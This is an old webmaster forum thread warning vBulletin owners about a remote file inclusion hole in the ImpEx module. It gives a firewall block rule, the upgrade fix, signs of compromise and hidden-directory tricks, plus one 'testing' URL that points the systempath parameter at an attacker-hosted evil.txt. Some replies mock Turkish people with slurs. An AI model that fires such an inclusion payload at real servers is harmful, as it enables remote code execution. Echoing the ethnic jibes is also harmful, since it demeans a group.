ALERT for all Forum owners running vBulletin.

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SplitInfinity
    Confirmed User
    • Dec 2002
    • 3047

    #1

    ALERT for all Forum owners running vBulletin.

    SplitInfinity Here letting you know that....

    There is a known Turkish hacker group targeting the adult industry.
    The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

    First, you should immediately block this class C:

    ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

    For some reason, they keep using the same ips. Lame hackers. :-)

    I have tracked them down and done some stuff to stop them from what they
    are doing.... however you should be warned that if you run vBulletin they
    will be hitting you soon! So far they have taken out over 10,000 sites
    as reported on securityfocus.

    Vulnerability Classification:

    * Remote/Network Access Required
    * Input Manipulation
    * Loss Of Integrity
    * Exploit Available
    * Verified
    * Web Related

    Products:

    * vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

    Solution:

    Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

    Manual Testing Notes:

    http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

    Where the hackers play...
    http://www.sanalinfaz.com/forumm/sho...=6140#post6140

    They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

    Places to check:
    /tmp
    /var/tmp/
    /var/tmp/ssh
    /var/tmp/root
    /var/tmp/

    Look for a file simply named "a" it is a backdoor.
    That list is NOT all inclusive as different groups will run different
    root kits for the same exploit....

    Look for hidden directories by hitting TAB.

    Example:

    ls -la
    total 20
    drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
    drwxrwxrwt 3 root root 4096 May 13 13:20 .
    drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..

    Notice the seemingly empty one on top?
    If it type: cd [TAB]

    I get this:
    cd \ /multi/

    They used control characters to hide the name of the directory. It
    becomes exposed when tab completion has a go at it. They basically
    named the directory " " space... :-)

    So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit
    they run is in there. :-)

    total 1360
    drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
    drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
    -rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
    -rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
    -rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
    -rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
    -rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
    -rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
    -rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
    -rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
    -rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
    -rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
    -rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
    -rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
    -rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
    -rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
    -rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
    -rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
    -rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
    -rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
    -rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
    -rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
    -rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
    -rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen


    Etc....
    the list goes on
  • $5 submissions
    I help you SUCCEED
    • Nov 2003
    • 32195

    #2
    Thanks for the heads up!

    Comment

    • loverboy
      When it rains, it pours
      • May 2003
      • 20609

      #3
      darn Turkish hackers

      they want my sig now?

      Comment

      • split_joel
        Confirmed User
        • Jan 2005
        • 2270

        #4
        hence proving my point chris is by far the whitest cracker here good find dude
        E-mail marketing - Automation Scripting - IP Space
        AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465

        Comment

        • SplitInfinity
          Confirmed User
          • Dec 2002
          • 3047

          #5
          Thanks.

          My opinion is that by sharing the info I find, I help secure everyone, not just my customers.

          However, it does put my customers in a good place, dont it? :-)

          Love ya all...

          Comment

          • Andiz
            Confirmed User
            • Feb 2006
            • 2594

            #6
            Thank you very much!!

            Comment

            • CDSmith
              Too lazy to set a custom title
              • May 2001
              • 51460

              #7
              Bump, if only to piss off the turkish hackers.
              Promote Wildmatch, ImLive, Sexier.com, and more!!

              ALWAYS THE HIGHEST PAYOUTS: Big Bux/ImLive SIGNUP ON NOW!!!

              Put some PUSSYCA$H in your pocket.
              ICQ me at: 31024634

              Comment

              • Spunky
                I need a beer
                • Jun 2002
                • 133986

                #8
                Here's a bump for TD

                Comment

                • madawgz
                  8.8.8.8
                  • Mar 2006
                  • 30509

                  #9
                  thanks for the update
                  TAEMDLRMSKRJIXMRLSMRJ.

                  Comment

                  • Tannerb
                    Registered User
                    • May 2006
                    • 19

                    #10
                    Sounds like those Ottoman Empire hackers, they arenhahaha8217;t just hacking the adult industry its all western sites, propaganda saying u attack our homes blah blah we attack your websites
                    ICQ 254-963-898

                    Comment

                    • fusionx
                      Confirmed User
                      • Nov 2003
                      • 4618

                      #11
                      will this hack work on windows servers?

                      Comment

                      • Manowar
                        jellyfish  
                        • Dec 2003
                        • 71528

                        #12
                        thx for the headsup

                        Comment

                        • fusionx
                          Confirmed User
                          • Nov 2003
                          • 4618

                          #13
                          Originally posted by -=LC=-
                          so you are only vulnerable if you have SO old a version

                          of vB, like older than version 1.7.5 ?

                          so is it anyone who's site has like ver 2.X.X or newer, this does not effect?

                          That's the vBulletin ImpEx Module version 1.74.

                          It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible).

                          Comment

                          • czarina
                            Webmaster Extraordinaire
                            • Jul 2002
                            • 10752

                            #14
                            turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?

                            Comment

                            • ladida
                              Confirmed User
                              • Nov 2005
                              • 2179

                              #15
                              Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
                              agentGFY *at* gmail.com

                              Comment

                              • JamesK2
                                Confirmed User
                                • Aug 2004
                                • 6589

                                #16
                                going to work on that soon, thx for the heads u[

                                Comment

                                • JamesK2
                                  Confirmed User
                                  • Aug 2004
                                  • 6589

                                  #17
                                  going to work on that soon, thx for the heads up

                                  Comment

                                  • Babaganoosh
                                    ♥♥♥ Likes Hugs ♥♥♥
                                    • Nov 2001
                                    • 15841

                                    #18
                                    Nice geek detective work. I'm impressed.
                                    I like pie.

                                    Comment

                                    • woj
                                      <&(©¿©)&>
                                      • Jul 2002
                                      • 47882

                                      #19
                                      with a properly secured server it should be impossible to own a site with this exploit...
                                      Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
                                      Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
                                      Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager

                                      Comment

                                      • elitetec
                                        Too lazy to set a custom title
                                        • Sep 2005
                                        • 4944

                                        #20
                                        just hell with turkish hacker, they even don't know english



                                        Add Your Site To My PR4 Blog
                                        Selling Sig ICQ-200636146

                                        Comment

                                        • minusonebit
                                          So Fucking Banned
                                          • Feb 2006
                                          • 7391

                                          #21
                                          Originally posted by fusionx
                                          will this hack work on windows servers?
                                          Even if it dosent, you can bet that 100s of others will.

                                          Comment

                                          • dunefield
                                            www.barely18movies.com
                                            • Feb 2003
                                            • 10920

                                            #22
                                            Cyber Jihad!!!

                                            Comment

                                            • SplitInfinity
                                              Confirmed User
                                              • Dec 2002
                                              • 3047

                                              #23
                                              Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.

                                              Comment

                                              • Sparks
                                                Confirmed User
                                                • Nov 2004
                                                • 2466

                                                #24
                                                Ah, Thanks for the heads up!

                                                Comment

                                                • sfera
                                                  Confirmed User
                                                  • Aug 2005
                                                  • 8597

                                                  #25
                                                  great heads up

                                                  Comment

                                                  • bizarredollars
                                                    Confirmed User
                                                    • Mar 2006
                                                    • 1582

                                                    #26
                                                    Thanks for the info!!

                                                    [email protected]
                                                    icq: 205-252-550

                                                    Comment

                                                    • Dagwolf
                                                      President of Canada
                                                      • Sep 2003
                                                      • 23141

                                                      #27

                                                      I want my GFY
                                                      Money for nothin'
                                                      and pics for free.
                                                      Sleep well, and dream of large women.

                                                      Comment

                                                      • split_joel
                                                        Confirmed User
                                                        • Jan 2005
                                                        • 2270

                                                        #28
                                                        Originally posted by fusionx
                                                        will this hack work on windows servers?
                                                        im not sure if chris solution will work for ur windows server but yes the windows servers are just as much @ risk if not more
                                                        E-mail marketing - Automation Scripting - IP Space
                                                        AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465

                                                        Comment

                                                        • MaddCaz
                                                          Confirmed User
                                                          • Mar 2006
                                                          • 9483

                                                          #29
                                                          Thanks for heads up!

                                                          BigCocks.com -
                                                          MatureWomen.com -
                                                          Tranny.com -
                                                          DrunkGirls.com -
                                                          TeenGirls.com -
                                                          MonsterCock.com and
                                                          many more... Click
                                                          here to see them all!

                                                          Comment

                                                          Working...